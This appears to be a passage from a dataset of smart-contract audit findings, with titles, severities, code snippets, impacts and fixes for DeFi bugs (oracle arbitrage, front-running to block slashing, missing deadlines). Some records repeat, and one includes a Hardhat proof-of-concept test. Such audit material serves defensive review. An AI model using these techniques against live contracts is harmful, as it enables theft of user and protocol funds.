trapped.ч```\\nfunction stakeFor(address _for, uint256 _amount)\\n public\\n returns(bool)\\n{\\n _processStake(_amount, _for);\\n\\n //take away from sender\\n stakingToken.safeTransferFrom(msg.sender, address(this), _amount);\\n emit Staked(_for, _amount);\\n \\n return true;\\n}\\n```\\n -Users can abuse discrepancies between oracle and true asset price to mint more OHM than needed and profit from itчhighчAll chainlink oracles have a deviation threshold between the current price of the asset and the on-chain price for that asset. The more oracles used for determining the price the larger the total discrepancy can be. These can be combined and exploited to mint more OHM than expected and profit.\\nBLVaultLido.sol#L156-L171\\n```\\n uint256 ohmWstethPrice = manager.getOhmTknPrice();\\n uint256 ohmMintAmount = (amount_ * ohmWstethPrice) / _WSTETH_DECIMALS;\\n\\n // Block scope to avoid stack too deep\\n {\\n // Cache OHM-wstETH BPT before\\n uint256 bptBefore = liquidityPool.balanceOf(address(this));\\n\\n // Transfer in wstETH\\n wsteth.safeTransferFrom(msg.sender, address(this), amount_);\\n\\n // Mint OHM\\n manager.mintOhmToVault(ohmMintAmount);\\n\\n // Join Balancer pool\\n _joinBalancerPool(ohmMintAmount, amount_, minLpAmount_);\\n```\\n\\nThe amount of OHM to mint and deposit is determined by the calculated price from the on-chain oracle prices.\\nBLVaultLido.sol#L355-L364\\n```\\n uint256[] memory maxAmountsIn = new uint256[](2);\\n maxAmountsIn[0] = ohmAmount_;\\n maxAmountsIn[1] = wstethAmount_;\\n\\n JoinPoolRequest memory joinPoolRequest = JoinPoolRequest({\\n assets: assets,\\n maxAmountsIn: maxAmountsIn,\\n userData: abi.encode(1, maxAmountsIn, minLpAmount_),\\n fromInternalBalance: false\\n });\\n```\\n\\nTo make the issue worse, _joinBalancerPool use 1 for the join type. This is the EXACT_TOKENS_IN_FOR_BPT_OUT method of joining. What this means is that the join will guaranteed use all input tokens. If the current pool isn't balanced in the same way then the join request will effectively swap one token so that the input tokens match the current pool. Now if the ratio is off then too much OHM will be minted and will effectively traded for wstETH. This allows the user to withdraw at a profit once the oracle has been updated the discrepancy is gone.чThe vault needs to have withdraw and/or deposit fees to make attacks like this unprofitable.чUsers can always time oracles so that they enter at an advantageous price and the deficit is paid by Olympus with minted OHMч```\\n uint256 ohmWstethPrice = manager.getOhmTknPrice();\\n uint256 ohmMintAmount = (amount_ * ohmWstethPrice) / _WSTETH_DECIMALS;\\n\\n // Block scope to avoid stack too deep\\n {\\n // Cache OHM-wstETH BPT before\\n uint256 bptBefore = liquidityPool.balanceOf(address(this));\\n\\n // Transfer in wstETH\\n wsteth.safeTransferFrom(msg.sender, address(this), amount_);\\n\\n // Mint OHM\\n manager.mintOhmToVault(ohmMintAmount);\\n\\n // Join Balancer pool\\n _joinBalancerPool(ohmMintAmount, amount_, minLpAmount_);\\n```\\n -stETH/ETH chainlink oracle has too long of heartbeat and deviation threshold which can cause loss of fundsчmediumчgetTknOhmPrice uses the stETH/ETH chainlink oracle to calculate the current price of the OHM token. This token valuation is used to determine the amount of stETH to skim from the user resulting from oracle arb. This is problematic since stETH/ETH has a 24 hour heartbeat and a 2% deviation threshold. This deviation in price could easily cause loss of funds to the user.\\nBLVaultManagerLido.sol#L458-L473\\n```\\nfunction getTknOhmPrice() public view override returns (uint256) {\\n // Get stETH per wstETH (18 Decimals)\\n uint256 stethPerWsteth = IWsteth(pairToken).stEthPerToken();\\n\\n // Get ETH per OHM (18 Decimals)\\n uint256 ethPerOhm = _validatePrice(ohmEthPriceFeed.feed, ohmEthPriceFeed.updateThreshold);\\n\\n // Get stETH per ETH (18 Decimals)\\n uint256 stethPerEth = _validatePrice(\\n stethEthPriceFeed.feed,\\n stethEthPriceFeed.updateThreshold\\n );\\n\\n // Calculate wstETH per OHM (18 decimals)\\n return (ethPerOhm * 1e36) / (stethPerWsteth * stethPerEth);\\n}\\n```\\n\\ngetTknOhmPrice uses the stETH/ETH oracle to determine the price which as stated above has a 24 hour hearbeat and 2% deviation threshold, this means that the price can move up to 2% or 24 hours before a price update is triggered. The result is that the on-chain price could be much different than the true stETH price.\\nBLVaultLido.sol#L232-L240\\n```\\n uint256 wstethOhmPrice = manager.getTknOhmPrice();\\n uint256 expectedWstethAmountOut = (ohmAmountOut * wstethOhmPrice) / _OHM_DECIMALS;\\n\\n // Take any arbs relative to the oracle price for the Treasury and return the rest to the owner\\n uint256 wstethToReturn = wstethAmountOut > expectedWstethAmountOut\\n ? expectedWstethAmountOut\\n : wstethAmountOut;\\n if (wstethAmountOut > wstethToReturn)\\n wsteth.safeTransfer(TRSRY(), wstethAmountOut - wstethToReturn);\\n \\n```\\n\\nThis price is used when determining how much stETH to send back to the user. Since the oracle can be up to 2% different from the true price, the user can unfairly lose part of their funds.чUse the stETH/USD oracle instead because it has a 1-hour heartbeat and a 1% deviation threshold.чUser will be unfairly penalized due large variance between on-chain price and asset priceч```\\nfunction getTknOhmPrice() public view override returns (uint256) {\\n // Get stETH per wstETH (18 Decimals)\\n uint256 stethPerWsteth = IWsteth(pairToken).stEthPerToken();\\n\\n // Get ETH per OHM (18 Decimals)\\n uint256 ethPerOhm = _validatePrice(ohmEthPriceFeed.feed, ohmEthPriceFeed.updateThreshold);\\n\\n // Get stETH per ETH (18 Decimals)\\n uint256 stethPerEth = _validatePrice(\\n stethEthPriceFeed.feed,\\n stethEthPriceFeed.updateThreshold\\n );\\n\\n // Calculate wstETH per OHM (18 decimals)\\n return (ethPerOhm * 1e36) / (stethPerWsteth * stethPerEth);\\n}\\n```\\n -Normal users could be inadvertently grieved by the withdrawn ratios checkчmediumчThe contract check on the withdrawn ratios of OHM and wstETH against the current oracle price could run into grieving naive users by taking any wstETH shifted imbalance as a fee to the treasury even though these users have not gamed the system.\\nHere is a typical scenario, assuming the pool has been initiated with total LP equal to sqrt(100_000 * 1_000) = 10_000. (Note: OHM: $15, wstETH: $1500 with the pool pricing match up with manager.getOhmTknPrice() or manager.getTknOhmPrice(), i.e. 100 OHM to 1 wstETH or 0.01 wstETH to 1 OHM. The pool token balances in each step below may be calculated via the Constant Product Simulation after each swap and stake.)\\n```\\nOHM token balance: 100_000\\nwstETH token balance: 1_000\\nTotal LP: 10_000\\n```\\n\\nA series of swap activities results in the pool shifted more of the LP into wstETH.\\nOHM token balance: 90_909.1 wstETH token balance: 1_100 Total LP: 10_000\\nBob calls `deposit()` by providing 11 wstETH where 1100 OHM is minted with 1100 - 90909.1 * 0.01 = 190.91 unused OHM burned. (Note: Bob successfully stakes with 909.09 OHM and 11 wstETH and proportionately receives 100 LP.)\\nOHM token balance: 91_818.19 wstETH token balance: 1_111 Total LP: 10_100 User's LP: 100\\nBob changes his mind instantly and proceeds to call `withdraw()` to remove all of his LP. He receives the originally staked 909.09 OHM and 11 wstETH. All OHM is burned but he is only entitled to receive 909.09 / 100 = 9.09 wstETH since the system takes any arbs relative to the oracle price for the Treasury and returns the rest to the owner.\\nOHM token balance: 90_909.1 wstETH token balance: 1_100 Total LP: 10_000 User's LP: 0чConsider implementing a snapshot of the entry record of OHM and wstETH and compare that with the proportionate exit record. Slash only the differential for treasury solely on dissuading large attempts to shift the pool around, and in this case it should be 0 wstETH since the originally staked wstETH is no greater than expectedWstethAmountOut.чBob suffers a loss of 11 - 9.09 = 1.91 wstETH (~ 17.36% loss), and the system is ready to trap the next user given the currently imbalanced pool still shifted more of the LP into wstETH.ч```\\nOHM token balance: 100_000\\nwstETH token balance: 1_000\\nTotal LP: 10_000\\n```\\n -Periphery#_swapPTsForTarget won't work correctly if PT is mature but redeem is restrictedчmediumчPeriphery#_swapPTsForTarget doesn't properly account for mature PTs that have their redemption restricted\\nPeriphery.sol#L531-L551\\n```\\nfunction _swapPTsForTarget(\\n address adapter,\\n uint256 maturity,\\n uint256 ptBal,\\n PermitData calldata permit\\n) internal returns (uint256 tBal) {\\n _transferFrom(permit, divider.pt(adapter, maturity), ptBal);\\n\\n if (divider.mscale(adapter, maturity) > 0) {\\n tBal = divider.redeem(adapter, maturity, ptBal); <- @audit-issue always tries to redeem even if restricted\\n } else {\\n tBal = _balancerSwap(\\n divider.pt(adapter, maturity),\\n Adapter(adapter).target(),\\n ptBal,\\n BalancerPool(spaceFactory.pools(adapter, maturity)).getPoolId(),\\n 0,\\n payable(address(this))\\n );\\n }\\n}\\n```\\n\\nAdapters can have their redeem restricted meaning the even when they are mature they can't be redeemed. In the scenario that it is restricted Periphery#_swapPTsForTarget simply won't work.чUse the same structure as _removeLiquidity:\\n```\\n if (divider.mscale(adapter, maturity) > 0) {\\n if (uint256(Adapter(adapter).level()).redeemRestricted()) {\\n ptBal = _ptBal;\\n } else {\\n // 2. Redeem PTs for Target\\n tBal += divider.redeem(adapter, maturity, _ptBal);\\n }\\n```\\nчRedemption will fail when redeem is restricted because it tries to redeem instead of swappingч```\\nfunction _swapPTsForTarget(\\n address adapter,\\n uint256 maturity,\\n uint256 ptBal,\\n PermitData calldata permit\\n) internal returns (uint256 tBal) {\\n _transferFrom(permit, divider.pt(adapter, maturity), ptBal);\\n\\n if (divider.mscale(adapter, maturity) > 0) {\\n tBal = divider.redeem(adapter, maturity, ptBal); <- @audit-issue always tries to redeem even if restricted\\n } else {\\n tBal = _balancerSwap(\\n divider.pt(adapter, maturity),\\n Adapter(adapter).target(),\\n ptBal,\\n BalancerPool(spaceFactory.pools(adapter, maturity)).getPoolId(),\\n 0,\\n payable(address(this))\\n );\\n }\\n}\\n```\\n -sponsorSeries() method fails when user want to swap for stake token usingчmediumч`sponsorSeries()` fails when user want to use `swapQuote` to swap for stake token to sponsor a series.\\nstake is token that user need to deposit (technically is pulled) to be able to sponsor a series for a given target. User has option to send `SwapQuote calldata quote` and swap any ERC20 token for stake token. Below is the code that doing transferFrom() of stakeToken not sellToken()\\n```\\nif (address(quote.sellToken) != ETH) _transferFrom(permit, stake, stakeSize);\\n if (address(quote.sellToken) != stake) _fillQuote(quote);\\n```\\n\\nExpected behaviour of this function is to pull `sellToken` from msg.sender when `address(quote.sellToken) != stake`. For example- stake token is WETH. User want to swap DAI for WETH in `sponsorSeries()`. In this case, user would be sending SwapQuote.sellToken = DAI and swapQuote.buyToke = WETH and expect that fillQuote() would swap it for WETH. This method will fail because `sellToken` not transferred from msg.sender.чConsider implementation of functionality to transferFrom `sellToken` from msg.sender with actual amount that is require to get exact amountOut greater or equal to `stakeSize`чsponsorSeries() fails when `address(quote.sellToken) != stake`ч```\\nif (address(quote.sellToken) != ETH) _transferFrom(permit, stake, stakeSize);\\n if (address(quote.sellToken) != stake) _fillQuote(quote);\\n```\\n -Refund of protocol fee is being to wrong userчmediumчThere is one function, _fillQuote(), which is handling swap from `0x`. Ideally If there is any remaining protocol fee (in ETH) then it will be returned to sender aka msg.sender. There are scenarios when fee can be sent to receiver of swap instead.\\nPeriphery and RollerPeriphery both are using almost identical logic in `_fillQuote()` hence this vulnerability affect both contracts. It exist if qupte.buyToken is ETH and there is any remaining protocol fee.\\nHere are pieces of puzzle\\nAfter swap if buyToken == ETH then store contract ETH balance in `boughtAmount`\\n```\\n// RollerPeriphery.sol\\n boughtAmount = address(quote.buyToken) == ETH ? address(this).balance : quote.buyToken.balanceOf(address(this));\\n```\\n\\nNext it store refundAmt\\n```\\n// RollerPeriphery.sol\\n // Refund any unspent protocol fees (paid in ether) to the sender.\\n uint256 refundAmt = address(this).balance;\\n```\\n\\nCalculate actual refundAmt and transfer to sender\\n```\\n if (address(quote.buyToken) == ETH) refundAmt = refundAmt - boughtAmount;\\n payable(msg.sender).transfer(refundAmt);\\n```\\n\\nThis is clear that due to line 251, 258 and 259, refundAmt is 0. So sender is not getting refund.\\nLater on in logic flow buyToken will be transferred to receiver\\n```\\n address(quote.buyToken) == ETH\\n ? payable(receiver).transfer(amtOut)\\n : ERC20(address(quote.buyToken)).safeTransfer(receiver, amtOut); // transfer bought tokens to receiver\\n```\\nчConsider intercepting refund amount properly when buyToken is ETH or else just handle refund when buyToken is NOT ETH and write some explanation around it.чSender is not getting protocol fee refund.ч```\\n// RollerPeriphery.sol\\n boughtAmount = address(quote.buyToken) == ETH ? address(this).balance : quote.buyToken.balanceOf(address(this));\\n```\\n -sponsorSeries() method fails when user want to swap for stake token usingчmediumч`sponsorSeries()` fails when user want to use `swapQuote` to swap for stake token to sponsor a series.\\nstake is token that user need to deposit (technically is pulled) to be able to sponsor a series for a given target. User has option to send `SwapQuote calldata quote` and swap any ERC20 token for stake token. Below is the code that doing transferFrom() of stakeToken not sellToken()\\n```\\nif (address(quote.sellToken) != ETH) _transferFrom(permit, stake, stakeSize);\\n if (address(quote.sellToken) != stake) _fillQuote(quote);\\n```\\n\\nExpected behaviour of this function is to pull `sellToken` from msg.sender when `address(quote.sellToken) != stake`. For example- stake token is WETH. User want to swap DAI for WETH in `sponsorSeries()`. In this case, user would be sending SwapQuote.sellToken = DAI and swapQuote.buyToke = WETH and expect that fillQuote() would swap it for WETH. This method will fail because `sellToken` not transferred from msg.sender.чConsider implementation of functionality to transferFrom `sellToken` from msg.sender with actual amount that is require to get exact amountOut greater or equal to `stakeSize`чsponsorSeries() fails when `address(quote.sellToken) != stake`ч```\\nif (address(quote.sellToken) != ETH) _transferFrom(permit, stake, stakeSize);\\n if (address(quote.sellToken) != stake) _fillQuote(quote);\\n```\\n -Periphery#_swapPTsForTarget won't work correctly if PT is mature but redeem is restrictedчmediumчPeriphery#_swapPTsForTarget doesn't properly account for mature PTs that have their redemption restricted\\nPeriphery.sol#L531-L551\\n```\\nfunction _swapPTsForTarget(\\n address adapter,\\n uint256 maturity,\\n uint256 ptBal,\\n PermitData calldata permit\\n) internal returns (uint256 tBal) {\\n _transferFrom(permit, divider.pt(adapter, maturity), ptBal);\\n\\n if (divider.mscale(adapter, maturity) > 0) {\\n tBal = divider.redeem(adapter, maturity, ptBal); <- @audit-issue always tries to redeem even if restricted\\n } else {\\n tBal = _balancerSwap(\\n divider.pt(adapter, maturity),\\n Adapter(adapter).target(),\\n ptBal,\\n BalancerPool(spaceFactory.pools(adapter, maturity)).getPoolId(),\\n 0,\\n payable(address(this))\\n );\\n }\\n}\\n```\\n\\nAdapters can have their redeem restricted meaning the even when they are mature they can't be redeemed. In the scenario that it is restricted Periphery#_swapPTsForTarget simply won't work.чUse the same structure as _removeLiquidity:\\n```\\n if (divider.mscale(adapter, maturity) > 0) {\\n if (uint256(Adapter(adapter).level()).redeemRestricted()) {\\n ptBal = _ptBal;\\n } else {\\n // 2. Redeem PTs for Target\\n tBal += divider.redeem(adapter, maturity, _ptBal);\\n }\\n```\\nчRedemption will fail when redeem is restricted because it tries to redeem instead of swappingч```\\nfunction _swapPTsForTarget(\\n address adapter,\\n uint256 maturity,\\n uint256 ptBal,\\n PermitData calldata permit\\n) internal returns (uint256 tBal) {\\n _transferFrom(permit, divider.pt(adapter, maturity), ptBal);\\n\\n if (divider.mscale(adapter, maturity) > 0) {\\n tBal = divider.redeem(adapter, maturity, ptBal); <- @audit-issue always tries to redeem even if restricted\\n } else {\\n tBal = _balancerSwap(\\n divider.pt(adapter, maturity),\\n Adapter(adapter).target(),\\n ptBal,\\n BalancerPool(spaceFactory.pools(adapter, maturity)).getPoolId(),\\n 0,\\n payable(address(this))\\n );\\n }\\n}\\n```\\n -The createMarket transaction lack of expiration timestamp checkчmediumчThe createMarket transaction lack of expiration timestamp check\\nLet us look into the heavily forked Uniswap V2 contract addLiquidity function implementation\\n```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = (amountAOptimal, amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, msg.sender, pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n\\nthe implementation has two point that worth noting,\\nthe first point is the deadline check\\n```\\nmodifier ensure(uint deadline) {\\n require(deadline >= block.timestamp, 'UniswapV2Router: EXPIRED');\\n _;\\n}\\n```\\n\\nThe transaction can be pending in mempool for a long time and can be executed in a long time after the user submit the transaction.\\nProblem is createMarket, which calculates the length and maxPayout by block.timestamp inside it.\\n```\\n // Calculate market length and check time bounds\\n uint48 length = uint48(params_.conclusion - block.timestamp); \\\\n if (\\n length < minMarketDuration ||\\n params_.depositInterval < minDepositInterval ||\\n params_.depositInterval > length\\n ) revert Auctioneer_InvalidParams();\\n\\n // Calculate the maximum payout amount for this market, determined by deposit interval\\n uint256 capacity = params_.capacityInQuote\\n ? params_.capacity.mulDiv(scale, price)\\n : params_.capacity;\\n market.maxPayout = capacity.mulDiv(uint256(params_.depositInterval), uint256(length));\\n```\\n\\nAfter the market is created at wrong time, user can call purchase. At purchaseBond(),\\n```\\n // Payout for the deposit = amount / price\\n //\\n // where:\\n // payout = payout tokens out\\n // amount = quote tokens in\\n // price = quote tokens : payout token (i.e. 200 QUOTE : BASE), adjusted for scaling\\n payout = amount_.mulDiv(term.scale, price);\\n\\n // Payout must be greater than user inputted minimum\\n if (payout < minAmountOut_) revert Auctioneer_AmountLessThanMinimum();\\n\\n // Markets have a max payout amount, capping size because deposits\\n // do not experience slippage. max payout is recalculated upon tuning\\n if (payout > market.maxPayout) revert Auctioneer_MaxPayoutExceeded();\\n```\\n\\npayout value is calculated by term.scale which the market owner has set assuming the market would be created at desired timestamp. Even, maxPayout is far bigger than expected, as it is calculated by very small length.чUse deadline, like uniswapчEven though the market owner close the market at any time, malicious user can attack the market before close and steal unexpectedly large amount of payout Tokens.ч```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = (amountAOptimal, amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, msg.sender, pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n -\"Equilibrium price\" is not used to compute the capacity (OSDA Only)чmediumч\"Equilibrium price\" is not used to compute the capacity leading to a smaller-than-expected max payout.\\nIn OFDA, it was observed that if the capacity is denominated in the quote token, the capacity will be calculated with the discounted price.\\n```\\nFile: BondBaseOFDA.sol\\n function _createMarket(MarketParams memory params_) internal returns (uint256) {\\n..SNIP..\\n // Calculate the maximum payout amount for this market\\n uint256 capacity = params_.capacityInQuote\\n ? params_.capacity.mulDiv(\\n scale,\\n price.mulDivUp(\\n uint256(ONE_HUNDRED_PERCENT - params_.fixedDiscount),\\n uint256(ONE_HUNDRED_PERCENT)\\n )\\n )\\n : params_.capacity;\\n market.maxPayout = capacity.mulDiv(uint256(params_.depositInterval), uint256(length));\\n```\\n\\nHowever, in OSDA, if the capacity is denominated in the quote token, the capacity will be calculated with the oracle price instead of the discounted price.\\n```\\nFile: BondBaseOSDA.sol\\n function _createMarket(MarketParams memory params_) internal returns (uint256) {\\n..SNIP..\\n // Calculate the maximum payout amount for this market, determined by deposit interval\\n uint256 capacity = params_.capacityInQuote\\n ? params_.capacity.mulDiv(scale, price)\\n : params_.capacity;\\n market.maxPayout = capacity.mulDiv(uint256(params_.depositInterval), uint256(length));\\n```\\n\\nIn OSDA, it was also observed that the base discount is applied to the oracle price while calculating the price decimals because this will be the initial equilibrium price of the market. However, this \"initial equilibrium price\" is not used earlier when computing the capacity.\\n```\\nFile: BondBaseOSDA.sol\\n function _validateOracle(\\n uint256 id_,\\n IBondOracle oracle_,\\n ERC20 quoteToken_,\\n ERC20 payoutToken_,\\n uint48 baseDiscount_\\n )\\n..SNIP..\\n // Get the price decimals for the current oracle price\\n // Oracle price is in quote tokens per payout token\\n // E.g. if quote token is $10 and payout token is $2000,\\n // then the oracle price is 200 quote tokens per payout token.\\n // If the oracle has 18 decimals, then it would return 200 * 10^18.\\n // In this case, the price decimals would be 2 since 200 = 2 * 10^2.\\n // We apply the base discount to the oracle price before calculating\\n // since this will be the initial equilibrium price of the market.\\n int8 priceDecimals = _getPriceDecimals(\\n currentPrice.mulDivUp(\\n uint256(ONE_HUNDRED_PERCENT - baseDiscount_),\\n uint256(ONE_HUNDRED_PERCENT)\\n ),\\n oracleDecimals\\n );\\n```\\nчApplied the discount to obtain the \"equilibrium price\" before computing the capacity.\\n```\\n// Calculate the maximum payout amount for this market, determined by deposit interval\\nuint256 capacity = params_.capacityInQuote\\n// Remove the line below\\n ? params_.capacity.mulDiv(scale, price)\\n// Add the line below\\n ? params_.capacity.mulDiv(scale, price.mulDivUp(\\n// Add the line below\\n uint256(ONE_HUNDRED_PERCENT // Remove the line below\\n params_.baseDiscount),\\n// Add the line below\\n uint256(ONE_HUNDRED_PERCENT)\\n// Add the line below\\n )\\n// Add the line below\\n )\\n : params_.capacity;\\nmarket.maxPayout = capacity.mulDiv(uint256(params_.depositInterval), uint256(length));\\n```\\nчAs the discount is not applied to the price when computing the capacity, the price will be higher which leads to a smaller capacity. A smaller capacity will in turn result in a smaller max payout. A smaller-than-expected max payout reduces the maximum number of payout tokens a user can purchase at any single point in time, which might reduce the efficiency of a Bond market.\\nUsers who want to purchase a large number of bond tokens have to break their trade into smaller chunks to overcome the smaller-than-expected max payout, leading to unnecessary delay and additional gas fees.ч```\\nFile: BondBaseOFDA.sol\\n function _createMarket(MarketParams memory params_) internal returns (uint256) {\\n..SNIP..\\n // Calculate the maximum payout amount for this market\\n uint256 capacity = params_.capacityInQuote\\n ? params_.capacity.mulDiv(\\n scale,\\n price.mulDivUp(\\n uint256(ONE_HUNDRED_PERCENT - params_.fixedDiscount),\\n uint256(ONE_HUNDRED_PERCENT)\\n )\\n )\\n : params_.capacity;\\n market.maxPayout = capacity.mulDiv(uint256(params_.depositInterval), uint256(length));\\n```\\n -`slash` calls can be blocked, allowing malicious users to bypass the slashing mechanism.чmediumчA malicious user can block slashing by frontrunning `slash` with a call to `stake(1)` at the same block, allowing him to keep blocking calls to `slash` while waiting for his withdraw delay, effectively bypassing the slashing mechanism.\\nStakingModule's `checkpointProtection` modifier reverts certain actions, like claims, if the accounts' stake was previously modified in the same block. A malicious user can exploit this to intentionally block calls to `slash`.\\nConsider the following scenario, where Alice has `SLASHER_ROLE` and Bob is the malicious user.\\nAlice calls `slash` on Bob's account.\\nBob sees the transaction on the mempool and tries to frontrun it by staking 1 TEL. (See Proof of Concept section below for a simplified example of this scenario)\\nIf Bob stake call is processed first (he can pay more gas to increase his odds of being placed before than Alice), his new stake is pushed to `_stakes[address(Bob)]`, and his latest checkpoint (_stakes[address(Bob)]._checkpoints[numCheckpoints - 1]) `blockNumber` field is updated to the current `block.number`. So when `slash` is being processed in the same block and calls internally `_claimAndExit` it will revert due to the `checkpointProtection` modifier check (See code snippet below).\\n```\\nmodifier checkpointProtection(address account) {\\n uint256 numCheckpoints = _stakes[account]._checkpoints.length;\\n require(numCheckpoints == 0 || _stakes[account]._checkpoints[numCheckpoints - 1]._blockNumber != block.number, \"StakingModule: Cannot exit in the same block as another stake or exit\");\\n _;\\n}\\n```\\n\\nBob can do this indefinitely, eventually becoming a gas war between Alice and Bob or until Alice tries to use Flashbots Protect or similar services to avoid the public mempool. More importantly, this can be leverage to block all `slash` attempts while waiting the time required to withdraw, so the malicious user could call `requestWithdrawal()`, then keep blocking all future `slash` calls while waiting for his `withdrawalDelay`, then proceed to withdraws his stake when `block.timestamp > withdrawalRequestTimestamps[msg.sender] + withdrawalDelay`. Therefore bypassing the slashing mechanism.\\nIn this modified scenario\\nAlice calls `slash` on Bob's account.\\nBob sees the transaction on the mempool and tries to frontrun it by staking 1 TEL.\\nBob requests his withdraw (requestWithdrawal())\\nBob keeps monitoring the mempool for future calls to `slash` against his account, trying to frontrun each one of them.\\nWhen enough time has passed so that his withdraw is available, Bob calls `exit` or `fullClaimAndExit`чConsider implementing a specific version of `_claimAndExit` without the `checkpointProtection` modifier, to be used inside the `slash` function.чSlashing calls can be blocked by malicious user, allowing him to request his withdraw, wait until withdraw delay has passed (while blocking further calls to slash) and then withdraw his funds.\\nClassify this one as medium severity, because even though there are ways to avoid being frontrunned, like paying much more gas or using services like Flashbots Protect, none is certain to work because the malicious user can use the same methods to their advantage. And if the malicious user is successful, this would result in loss of funds to the protocol (i.e funds that should have been slashed, but user managed to withdraw them)\\nProof of Concept\\nThe POC below shows that staking prevents any future call to `slash` on the same block. To reproduce this POC just copy the code to a file on the test/ folder and run it.\\n```\\nconst { expect } = require(\"chai\")\\nconst { ethers, upgrades } = require(\"hardhat\")\\n\\nconst emptyBytes = []\\n\\ndescribe(\"POC\", () => {\\n let deployer\\n let alice\\n let bob\\n let telContract\\n let stakingContract\\n let SLASHER_ROLE\\n\\n beforeEach(\"setup\", async () => {\\n [deployer, alice, bob] = await ethers.getSigners()\\n\\n //Deployments\\n const TELFactory = await ethers.getContractFactory(\"TestTelcoin\", deployer)\\n const StakingModuleFactory = await ethers.getContractFactory(\\n \"StakingModule\",\\n deployer\\n )\\n telContract = await TELFactory.deploy(deployer.address)\\n await telContract.deployed()\\n stakingContract = await upgrades.deployProxy(StakingModuleFactory, [\\n telContract.address,\\n 3600,\\n 10\\n ])\\n\\n //Grant SLASHER_ROLE to Alice\\n SLASHER_ROLE = await stakingContract.SLASHER_ROLE()\\n await stakingContract\\n .connect(deployer)\\n .grantRole(SLASHER_ROLE, alice.address)\\n\\n //Send some TEL tokens to Bob\\n await telContract.connect(deployer).transfer(bob.address, 1)\\n\\n //Setup approvals\\n await telContract\\n .connect(bob)\\n .approve(stakingContract.address, 1)\\n })\\n\\n describe(\"POC\", () => {\\n it(\"should revert during slash\", async () => {\\n //Disable auto-mining and set interval to 0 necessary to guarantee both transactions\\n //below are mined in the same block, reproducing the frontrunning scenario.\\n await network.provider.send(\"evm_setAutomine\", [false]);\\n await network.provider.send(\"evm_setIntervalMining\", [0]);\\n\\n //Bob stakes 1 TEL\\n await stakingContract\\n .connect(bob)\\n .stake(1)\\n\\n //Turn on the auto-mining, so that after the next transaction is sent, the block is mined.\\n await network.provider.send(\"evm_setAutomine\", [true]);\\n \\n //Alice tries to slash Bob, but reverts.\\n await expect(stakingContract\\n .connect(alice)\\n .slash(bob.address, 1, stakingContract.address, emptyBytes)).to.be.revertedWith(\\n \"StakingModule: Cannot exit in the same block as another stake or exit\"\\n )\\n })\\n })\\n})\\n```\\nч```\\nmodifier checkpointProtection(address account) {\\n uint256 numCheckpoints = _stakes[account]._checkpoints.length;\\n require(numCheckpoints == 0 || _stakes[account]._checkpoints[numCheckpoints - 1]._blockNumber != block.number, \"StakingModule: Cannot exit in the same block as another stake or exit\");\\n _;\\n}\\n```\\n -FeeBuyback.submit() method may fail if all allowance is not used by referral contractчmediumчInside `submit()` method of `FeeBuyback.sol`, if token is `_telcoin` then it safeApprove to `_referral` contract. If `_referral` contract do not use all allowance then `submit()` method will fail in next call.\\n`SafeApprove()` method of library `SafeERC20Upgradeable` 